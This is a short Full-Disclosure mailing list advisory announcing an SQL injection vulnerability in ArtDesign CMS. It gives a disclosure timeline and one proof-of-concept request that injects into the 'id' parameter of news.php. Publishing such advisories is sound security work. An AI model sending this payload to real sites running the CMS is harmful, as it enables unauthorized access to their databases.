Hello Full-Disclosure! I want to warn you about security vulnerability in ArtDesign CMS. It's Ukrainian commercial CMS. ----------------------------- Advisory: Vulnerability in ArtDesign CMS ----------------------------- URL: http://websecurity.com.ua/4035/ ----------------------------- Affected products: ArtDesign CMS. ----------------------------- Timeline: 17.09.2009 - found vulnerability. 15.03.2010 - announced at my site. 16.03.2010 - informed developers. 28.05.2010 - disclosed at my site. ----------------------------- Details: This is SQL Injection vulnerability. SQL Injection: http://site/news.php?ch=id&id=-1'%20or%20version()=5/* Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/